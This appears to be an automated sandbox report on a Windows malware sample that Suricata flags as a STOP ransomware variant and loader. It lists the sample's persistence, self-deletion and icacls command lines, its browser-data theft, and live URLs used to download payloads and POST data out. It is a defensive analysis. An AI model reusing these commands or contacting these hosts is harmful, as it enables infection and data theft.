Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	March 12, 2023, 11:03 a.m.	March 12, 2023, 11:07 a.m.

Size	779.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`918b9b4d245035565fd159b7202ed708`
SHA256	`1ed1022d58b250eff16be7af0d84dc5fb103cedc8f14c895ff239e5f43e8b34d`
CRC32	`9D05DB56`
ssdeep	`12288:yNZoFNFxUYLYZc+g6EXAhmuGMERItl6eFQqW6I/vAHdrhQ6:yIFa0YZc+3EwbGNSlJQx/o5hX`
Yara	UPX_Zero - UPX packed file Malicious_Library_Zero - Malicious_Library OS_Processor_Check_Zero - OS Processor Check IsPE32 - (no description) PE_Header_Zero - PE File Signature

build.exe "C:\Users\test22\AppData\Local\Temp\build.exe"
1460
- build.exe "C:\Users\test22\AppData\Local\Temp\build.exe"
  2108
  - icacls.exe icacls "C:\Users\test22\AppData\Local\75fe9bcd-3a70-4b99-b8ee-8282ac6a5e90" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    2252
  - build.exe "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask
    2312
    - build.exe "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask
      2392
      - build2.exe "C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe"
        2600
        
        build2.exe "C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe"
        2668
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe" & exit
        2340
        
        timeout.exe timeout /t 6
        2404
      - build3.exe "C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build3.exe"
        2848
        
        schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe"
        2928

Name	Response	Post-Analysis Lookup
zexeq.com	A 175.126.109.15 A 222.236.49.123 A 211.59.14.90 A 123.140.161.243 A 190.140.74.43 A 86.122.83.142 A 58.235.189.192 A 138.36.3.134 A 151.251.19.81 A 211.171.233.129	37.34.248.24
api.2ip.ua	A 162.0.217.254	162.0.217.254
t.me	A 149.154.167.99	149.154.167.99
uaery.top	A 210.182.29.70 A 176.226.127.181 A 187.245.185.123 A 211.171.233.126 A 211.59.14.90 A 190.229.19.7 A 186.182.55.44 A 58.235.189.192 A 211.119.84.112 A 211.171.233.129	210.182.29.70
steamcommunity.com	A 104.76.78.101	104.76.78.101

IP Address	Status	Action
104.76.78.101	Active	Moloch
116.202.6.47	Active	Moloch
149.154.167.99	Active	Moloch
162.0.217.254	Active	Moloch
164.124.101.2	Active	Moloch
211.119.84.112	Active	Moloch
211.59.14.90	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2027026	ET POLICY External IP Address Lookup DNS Query (2ip .ua)	Device Retrieving External IP Address Detected
UDP 192.168.56.103:50800 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 162.0.217.254:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49174 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 162.0.217.254:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49185 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49185 -> 149.154.167.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49185 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49164 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 162.0.217.254:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49164 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 162.0.217.254:443 -> 192.168.56.103:49166	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49190 -> 116.202.6.47:80	2027262	ET INFO Dotted Quad Host ZIP Request	Potentially Bad Traffic
TCP 192.168.56.103:49178 -> 211.119.84.112:80	2002400	ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)	A Network Trojan was detected
TCP 192.168.56.103:49178 -> 211.119.84.112:80	2020826	ET MALWARE Potential Dridex.Maldoc Minimal Executable Request	A Network Trojan was detected
TCP 192.168.56.103:49178 -> 211.119.84.112:80	2022896	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016	A Network Trojan was detected
TCP 192.168.56.103:49178 -> 211.119.84.112:80	2036333	ET MALWARE Win32/Vodkagats Loader Requesting Payload	A Network Trojan was detected
TCP 192.168.56.103:49178 -> 211.119.84.112:80	2023882	ET INFO HTTP Request to a *.top domain	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 162.0.217.254:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49173 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 211.119.84.112:80 -> 192.168.56.103:49178	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 211.119.84.112:80 -> 192.168.56.103:49178	2023464	ET HUNTING Possible EXE Download From Suspicious TLD	Misc activity
TCP 211.119.84.112:80 -> 192.168.56.103:49178	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.103:49177 -> 211.59.14.90:80	2002400	ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)	A Network Trojan was detected
TCP 192.168.56.103:49177 -> 211.59.14.90:80	2036334	ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key	A Network Trojan was detected
TCP 211.59.14.90:80 -> 192.168.56.103:49177	2036335	ET MALWARE Win32/Filecoder.STOP Variant Public Key Download	A Network Trojan was detected
TCP 149.154.167.99:443 -> 192.168.56.103:49187	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 211.59.14.90:80	2020826	ET MALWARE Potential Dridex.Maldoc Minimal Executable Request	A Network Trojan was detected
TCP 192.168.56.103:49179 -> 211.59.14.90:80	2036333	ET MALWARE Win32/Vodkagats Loader Requesting Payload	A Network Trojan was detected
TCP 211.59.14.90:80 -> 192.168.56.103:49179	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.103:49183 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49183 -> 149.154.167.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49183 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49165 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 162.0.217.254:443 -> 192.168.56.103:49175	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49189 -> 104.76.78.101:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49174 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49185 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49164 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49183 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49189 104.76.78.101:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com	b1:30:5e:4c:ee:14:70:87:a7:d7:1c:77:07:b5:3c:2c:99:13:aa:c5

Queries for the computername (11 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 12, 2023, 11:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 12, 2023, 11:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 12, 2023, 11:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 12, 2023, 11:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 12, 2023, 11:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 12, 2023, 11:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 12, 2023, 11:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 12, 2023, 11:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 12, 2023, 11:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 12, 2023, 11:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 12, 2023, 11:03 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 12, 2023, 11:03 a.m.			0	0
IsDebuggerPresent March 12, 2023, 11:03 a.m.			0	0
IsDebuggerPresent March 12, 2023, 11:03 a.m.			0	0

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 12, 2023, 11:03 a.m.	buffer: SUCCESS: The scheduled task "Azure-Update-Task" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 12, 2023, 11:04 a.m.	buffer: Waiting for 6 console_handle: 0x00000007	1	1
WriteConsoleW March 12, 2023, 11:04 a.m.	buffer: seconds, press a key to continue ... console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 12, 2023, 11:03 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.zuhu

The file contains an unknown PE resource name possibly indicative of a packer (6 events)

resource name	AFX_DIALOG_LAYOUT
resource name	FOSURAT
resource name	SEBOLOTEVIJIBUTO
resource name	SIJAFECOJAGEGODE
resource name	VASUCELISUNOVEDOYIKE
resource name	None

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://116.202.6.47/
suspicious_features	Connection to IP address	suspicious_request	GET http://116.202.6.47/photos.zip
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://116.202.6.47/

Performs some HTTP requests (7 events)

request	GET http://zexeq.com/test2/get.php?pid=06280D9CD13939E9B7E95CDCAA6A83CC&first=true
request	GET http://uaery.top/dl/build2.exe
request	GET http://zexeq.com/files/1/build3.exe
request	GET http://116.202.6.47/
request	GET http://116.202.6.47/photos.zip
request	POST http://116.202.6.47/
request	GET https://steamcommunity.com/profiles/76561199471222742

Sends data using the HTTP POST Method (1 event)

request

POST http://116.202.6.47/

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

uaery.top

description

Generic top level domain TLD

Allocates read-write-execute memory (usually to unpack itself) (10 events)

Time & API	Arguments	Status
NtProtectVirtualMemory March 12, 2023, 11:03 a.m.	process_identifier: 1460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 598016 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00610000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 12, 2023, 11:03 a.m.	process_identifier: 1460 region_size: 1159168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 12, 2023, 11:03 a.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 598016 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e90000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 12, 2023, 11:03 a.m.	process_identifier: 2312 region_size: 1159168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 12, 2023, 11:03 a.m.	process_identifier: 2600 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 208896 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0065c000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 12, 2023, 11:03 a.m.	process_identifier: 2600 region_size: 380928 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 12, 2023, 11:03 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b0000 allocation_type: 12289 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 12, 2023, 11:03 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003c0000 allocation_type: 12289 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 12, 2023, 11:03 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d0000 allocation_type: 12289 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 12, 2023, 11:03 a.m.	process_identifier: 2668 region_size: 995328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x61e00000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

Steals private information from local Internet browsers (50 out of 4754 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\4.10.2391.0\_platform_specific\win_x64\widevinecdm.dll.sig\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\4\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Module Info Cache\IndexedDB\chrome-extension_hpglfhgfnhbgpjdenjgmdgoeiappafln_0.indexeddb.leveldb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\th\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\iw\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Module Info Cache\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\uk\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\bgpipimickeadkjlklgciifhnalhdjhe\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\it\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Local Extension Settings\fmhmiaejopepamlcjkncpgpdjichnecm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\IndexedDB\chrome-extension_hpglfhgfnhbgpjdenjgmdgoeiappafln_0.indexeddb.leveldb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_CN\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Sync Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es_419\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\fmhmiaejopepamlcjkncpgpdjichnecm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\lo\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\1256\_platform_specific\all\sths\03019df3fd85a69a8ebd1facc6da9ba73e469774fe77f579fc5a08b8328c1d6b.sth\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_2\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\52\manifest.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\ka\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\tr\Network\Cookies

Creates executable files on the filesystem (8 events)

file	C:\ProgramData\vcruntime140.dll
file	C:\ProgramData\msvcp140.dll
file	C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe
file	C:\ProgramData\nss3.dll
file	C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build3.exe
file	C:\ProgramData\freebl3.dll
file	C:\ProgramData\mozglue.dll
file	C:\ProgramData\softokn3.dll

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe" & exit
cmdline	C:\Windows\System32\cmd.exe /c timeout /t 6 & del /f /q "C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe" & exit

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe
file	C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build3.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe
file	C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build3.exe

Executes one or more WMI queries (1 event)

wmi

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW March 12, 2023, 11:04 a.m.	show_type: 0 filepath_r: C:\Windows\System32\cmd.exe parameters: /c timeout /t 6 & del /f /q "C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe" & exit filepath: C:\Windows\System32\cmd.exe	1	1	0
CreateProcessInternalW March 12, 2023, 11:03 a.m.	thread_identifier: 2932 thread_handle: 0x000000ac process_identifier: 2928 current_directory: filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000b0	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (12 events)

Time & API	Arguments	Status	Return
Process32NextW March 12, 2023, 11:03 a.m.	snapshot_handle: 0x0000058c process_name: pw.exe process_identifier: 804	1	1
Process32NextW March 12, 2023, 11:03 a.m.	snapshot_handle: 0x0000058c process_name: taskhost.exe process_identifier: 508	1	1
Process32NextW March 12, 2023, 11:03 a.m.	snapshot_handle: 0x0000058c process_name: SearchProtocolHost.exe process_identifier: 1132	1	1
Process32NextW March 12, 2023, 11:03 a.m.	snapshot_handle: 0x0000058c process_name: SearchFilterHost.exe process_identifier: 1188	1	1
Process32NextW March 12, 2023, 11:03 a.m.	snapshot_handle: 0x0000058c process_name: build.exe process_identifier: 2392	1	1
Process32NextW March 12, 2023, 11:03 a.m.	snapshot_handle: 0x0000058c process_name: build2.exe process_identifier: 2668	1	1
Process32NextW March 12, 2023, 11:03 a.m.	snapshot_handle: 0x0000058c process_name: svchost.exe process_identifier: 2772	1	1
Process32NextW March 12, 2023, 11:03 a.m.	snapshot_handle: 0x0000058c process_name: mscorsvw.exe process_identifier: 2800	1	1
Process32NextW March 12, 2023, 11:03 a.m.	snapshot_handle: 0x0000058c process_name: mscorsvw.exe process_identifier: 2888	1	1
Process32NextW March 12, 2023, 11:03 a.m.	snapshot_handle: 0x0000058c process_name: sppsvc.exe process_identifier: 2996	1	1
Process32NextW March 12, 2023, 11:03 a.m.	snapshot_handle: 0x0000058c process_name: WmiPrvSE.exe process_identifier: 2152	1	1
Process32NextW March 12, 2023, 11:03 a.m.	snapshot_handle: 0x0000058c process_name: process_identifier: 32244048		0

An executable file was downloaded by the process build.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
